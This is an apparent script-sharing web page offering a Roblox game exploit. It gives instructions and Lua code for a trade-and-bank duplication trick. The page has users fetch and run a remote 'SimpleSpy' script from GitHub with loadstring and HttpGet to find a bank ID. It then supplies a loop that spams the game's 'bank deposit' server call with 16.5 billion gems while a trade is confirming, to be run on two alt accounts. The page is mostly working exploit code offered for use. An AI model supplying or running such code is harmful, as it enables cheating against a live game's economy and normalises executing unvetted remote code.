Thank you for using our website
Your script:
First use the script this script and find the bank ID:
loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua"))()
get into the trade and put the gem amount you want.. must be the same as [3]
execute the script then press ready on both alts
local args = {
[1] = {
[1] = "", -- bank id
[2] = {},
[3] = 16500000000 -- gems amount
}
}
while true do
if game.Players.LocalPlayer.PlayerGui.Trading.Frame.Trade.Visible == true and game.Players.LocalPlayer.PlayerGui.Trading.Frame.Trade.Notice.Text == '⌛ Trade confirming...' then
task.wait(0.7)
workspace.__THINGS.__REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))
end
task.wait()
end